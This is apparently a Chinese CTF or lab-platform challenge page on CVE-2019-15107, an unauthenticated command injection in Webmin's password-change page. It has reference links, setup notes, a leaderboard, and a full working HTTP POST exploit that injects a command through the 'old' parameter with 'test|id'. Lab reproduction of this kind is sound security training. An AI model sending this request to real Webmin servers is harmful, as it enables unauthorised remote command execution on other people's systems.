CVE-2019-15107

题目描述：

Webmin是一个用于管理类Unix系统的管理配置工具，具有Web页面。在其找回密码页面中，存在一处无需权限的命令注入漏洞，通过这个漏洞攻击者即可以执行任意系统命令。

题目提示：

参考链接：

https://www.pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html
https://www.exploit-db.com/exploits/47230
https://blog.firosolutions.com/exploits/webmin/

环境搭建

启动环境后，点击链接，忽略证书后即可看到webmin的登录页面。

漏洞复现

参考链接中的数据包是不对的，经过阅读代码可知，只有在发送的user参数的值不是已知Linux用户的情况下（而参考链接中是user=root），才会进入到修改/etc/shadow的地方，触发命令注入漏洞。

发送如下数据包，即可执行命令id：

POST /password_change.cgi HTTP/1.1
Host: your-ip:10000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: redirect=1; testing=1; sid=x; sessiontest=1
Referer: https://your-ip:10000/session_login.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 60

user=rootxx&amp;pam=&amp;expired=2&amp;old=test|id&amp;new1=test2&amp;new2=test2

作者

snow

解题次数

一血

snow

消耗金币

分数

100

最高奖励

创建题目环境

提交

您尚未登录，请登录或注册后评论

0 人参与 | 0 条评论

个人空间

创建题目

竞赛列表

创建比赛

题目

解题

分数

金币

暂无解题记录

知识点

任意文件读取反序列化命令执行本地靶场 SSRF 代码审计代码执行文件上传权限提升签到

题目分类

CVE 40
REV 1
WEB 33
签到 1

分数排行

F1rstb100d
2100
3099967366@qq.com
1200
cjz-chen
900
tim
600
snow
400
youxia
300
av3bqevx6
300
yaemiko1024
200
霞鸣
200
恐怖直立猿
200